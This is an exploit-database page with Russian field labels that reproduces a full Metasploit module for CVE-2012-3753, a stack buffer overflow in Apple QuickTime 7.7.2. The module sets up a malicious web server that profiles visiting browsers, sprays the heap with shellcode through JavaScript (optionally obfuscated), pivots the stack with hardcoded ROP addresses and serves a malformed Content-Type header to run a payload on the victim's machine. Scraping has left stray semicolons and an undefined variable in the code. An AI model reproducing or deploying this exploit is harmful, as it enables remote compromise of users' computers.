Apple QuickTime 7.7.2 MIME Type Buffer Overflow Exploit

Свойства

Дата публикации:
27.11.2012
Цель:
Apple QuickTime 7.7.2
Тип воздействия:
Компрометация системы

Код

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::Egghunter
    include Msf::Exploit::RopDb

    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
        :os_name    => OperatingSystems::WINDOWS,
        :ua_name    => HttpClients::SAFARI,
        :ua_maxver  => '5.0.1',
        :ua_maxver  => '5.1.7',
        :javascript => true,
        :rank       => NormalRanking, # reliable memory corruption
        :vuln_test  => nil
    })

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Apple QuickTime 7.7.2 MIME Type Buffer Overflow',
            'Description'    => %q{
                    This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack
                based overflow occurs when processing a malformed Content-Type header. The module
                has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.
            },
            'Author'         =>
                [
                    'Pavel Polischouk', # Vulnerability discovery
                    'juan vazquez' # Metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'CVE', '2012-3753' ],
                    [ 'OSVDB', '87088'],
                    [ 'BID', '56438' ],
                    [ 'URL', 'http://support.apple.com/kb/HT5581'; ],
                    [ 'URL', 'http://asintsov.blogspot.com.es/2012/11/heapspray.html'; ]
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'        =>
                {
                    'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
                },
            'Platform' => 'win',
            'Targets'  =>
                [
                    # Tested with QuickTime 7.7.2
                    [ 'Automatic', {} ],
                    [ 'Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2',
                        {
                            'OffsetFirstStackPivot' => 389,
                            'OffsetSecondStackPivot' => 105,
                            'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,
                            'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts
                            'SprayOffset' => 264,
                            'SprayedAddress' => 0x60130124
                        }
                    ],
                    [ 'Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2',
                        {
                            'OffsetFirstStackPivot' => 389,
                            'OffsetSecondStackPivot' => 105,
                            'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,
                            'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts
                            'SprayOffset' => 264,
                            'SprayedAddress' => 0x60130124
                        }
                    ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'Nov 07 2012',
            'DefaultTarget'  => 0))

        register_options(
            [
                OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
            ], self.class
        )
    end

    def get_target(agent)
        #If the user is already specified by the user, we'll just use that
        return target if target.name != 'Automatic'

        nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''

        browser_name = ""
        if agent =~ /Safari/ and agent=~ /Version\/5\.1\.7/
            browser_name = "Safari 5.1.7"
        elsif agent =~ /Safari/ and agent=~ /Version\/5\.0\.5/
            browser_name = "Safari 5.0.5"
        end

        os_name = 'Windows XP SP3'

        targets.each do |t|
            if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
                print_status("Target selected as: #{t.name}")
                return t
            end
        end

        return nil
    end

    def on_request_uri(client, request)

        agent = request.headers['User-Agent']
        my_target = get_target(agent)

        # Avoid the attack if the victim doesn't have the same setup we're targeting
        if my_target.nil?
            print_error("Browser not supported: #{agent}")
            send_not_found(cli)
            return
        end

        return if ((p = regenerate_payload(client)) == nil)

        if request.uri =~ /\.smil$/
            print_status("Sending exploit (target: #{my_target.name})")
            smil = rand_text_alpha(20)
            type = rand_text_alpha_lower(1)
            subtype = rand_text_alpha_lower(my_target['OffsetSecondStackPivot'])
            subtype << [my_target['SecondStackPivot']].pack("V")
            subtype << [my_target['SprayedAddress']].pack("V")
            subtype << rand_text_alpha_lower(my_target['OffsetFirstStackPivot'] - subtype.length)
            subtype << rand_text_alpha_lower(4)
            subtype << [my_target['FirstStackPivot']].pack("V")
            subtype << rand_text_alpha_lower(10000 - subtype.length)
            send_response(client, smil, { 'Content-Type' => "#{type}/#{subtype}" })
        else
            print_status("Sending initial HTML")
            url =  ((datastore['SSL']) ? "https://"; : "http://";)
            url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
            url << ":" + datastore['SRVPORT'].to_s
            url << get_resource
            fname = rand_text_alphanumeric(4)

            code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
            js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))
            offset = rand_text(my_target['SprayOffset'])
            js_offset = Rex::Text.to_unescape(offset, Rex::Arch.endian(my_target.arch))
            fill = rand_text(4)
            js_fill = Rex::Text.to_unescape(fill, Rex::Arch.endian(my_target.arch))

            # Heap Spray based on http://asintsov.blogspot.com.es/2012/11/heapspray.html
            js = <<-JSSPRAY
function heapSpray(offset, shellcode, fillsled) {
    var chunk_size, headersize, fillsled_len, code;
    var i, codewithnum;
    chunk_size = 0x40000;
    headersize = 0x10;
    fillsled_len = chunk_size - (headersize + offset.length + shellcode.length);
    while (fillsled.length <fillsled_len)
        fillsled += fillsled;
    fillsled = fillsled.substring(0, fillsled_len);
    code = offset + shellcode + fillsled;
    heap_chunks = new Array();
    for (i = 0; i<1000; i++)
    {
        codewithnum = "HERE" + code;
        heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
    }
}
var myoffset = unescape("#{js_offset}");
var myshellcode = unescape("#{js_code}");
var myfillsled = unescape("#{js_fill}");
heapSpray(myoffset,myshellcode,myfillsled);
            JSSPRAY

            if datastore['OBFUSCATE']
                js = ::Rex::Exploitation::JSObfu.new(js)
                js.obfuscate
            end

            content =  "<html>"
            content << "<head><script>"
            content << "#{js}"
            content << "</script></head>"
            content << "<body>"
            content << <<-ENDEMBED
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
WIDTH="1"
HEIGHT="1"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab";>
<PARAM name="SRC"        VALUE = "#{url}/#{fname}.smil">
<PARAM name="QTSRC"      VALUE = "#{url}/#{fname}.smil">
<PARAM name="AUTOPLAY"   VALUE = "true"               >
<PARAM name="TYPE"       VALUE = "video/quicktime"    >
<PARAM name="TARGET"     VALUE = "myself"             >
<EMBED
    SRC        = "#{url}/#{fname}.smil"
    QTSRC      = "#{url}/#{fname}.smil"
    TARGET     = "myself"
    WIDTH      = "1"
    HEIGHT     = "1"
    AUTOPLAY   = "true"
    PLUGIN     = "quicktimeplugin"
    TYPE       = "video/quicktime"
    CACHE      = "false"
    PLUGINSPAGE= "http://www.apple.com/quicktime/download/"; >
</EMBED>
</OBJECT>
            ENDEMBED
            content << "</body></html>"
            send_response(client, content, { 'Content-Type' => "text/html" })
        end

        # Handle the payload
        handler(client)
    end

end

или введите имя

CAPTCHA